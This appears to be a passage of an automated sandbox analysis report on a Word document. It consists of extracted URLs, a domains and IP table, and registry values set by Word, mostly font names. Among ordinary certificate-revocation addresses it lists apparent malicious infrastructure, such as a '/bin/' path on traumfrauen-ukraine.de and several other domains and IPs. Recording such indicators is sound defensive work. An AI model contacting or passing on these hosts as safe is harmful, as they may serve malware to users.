http://www.entrust.net/CRL/net1.crl0
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
https://www.catcert.net/verarrel
|
unknown
|
||
http://www.disig.sk/ca0f
|
unknown
|
||
http://www.e-szigno.hu/RootCA.crl
|
unknown
|
||
http://www.signatur.rtr.at/current.crl0
|
unknown
|
||
http://crl.xrampsecurity.com/XGCA.crl0
|
unknown
|
||
http://www.quovadis.bm0
|
unknown
|
||
http://www.trustdst.com/certificates/policy/ACES-index.html0
|
unknown
|
||
http://www.firmaprofesional.com0
|
unknown
|
||
https://www.netlock.net/docs
|
unknown
|
||
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
|
unknown
|
||
http://cps.chambersign.org/cps/publicnotaryroot.html0
|
unknown
|
||
http://www.e-trust.be/CPS/QNcerts
|
unknown
|
||
http://www.certicamara.com/certicamaraca.crl0
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
|
unknown
|
||
http://fedir.comsign.co.il/crl/ComSignCA.crl0
|
unknown
|
||
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
http://cps.chambersign.org/cps/chambersroot.html0
|
unknown
|
||
http://www.acabogacia.org0
|
unknown
|
||
http://www.valicert.
|
unknown
|
||
https://ca.sia.it/seccli/repository/CPS0
|
unknown
|
||
http://crl.securetrust.com/SGCA.crl0
|
unknown
|
||
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
|
unknown
|
||
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://www.certicamara.com/certicamaraca.crl0;
|
unknown
|
||
http://www.e-szigno.hu/RootCA.crt0
|
unknown
|
||
http://www.quovadisglobal.com/cps0
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
http://www.valicert.com/1
|
unknown
|
||
http://www.e-szigno.hu/SZSZ/0
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
https://ocsp.quovadisoffshore.com0
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
https://traumfrauen-ukraine.de/bin/JyeS/
|
unknown
|
||
http://ca.sia.it/secsrv/repository/CRL.der0J
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
https://sectigo.com/CPS0
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
http://www.ancert.com/cps0
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
shop.nowfal.dev
|
104.21.88.166
|
||
traumfrauen-ukraine.de
|
212.227.200.73
|
||
nightlifemumbai.club
|
172.217.6.174
|
||
jflmktg.wpcomstaging.com
|
192.0.78.20
|
||
e-wdesign.eu
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
104.21.88.166
|
unknown
|
United States
|
unknown
|
||
192.0.78.20
|
unknown
|
United States
|
unknown
|
||
212.227.200.73
|
unknown
|
Germany
|
unknown
|
||
172.217.6.174
|
unknown
|
United States
|
unknown
|
||
190.55.186.229
|
unknown
|
Argentina
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
wo7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
q7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
gr7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EDBCE
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F8B5E
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
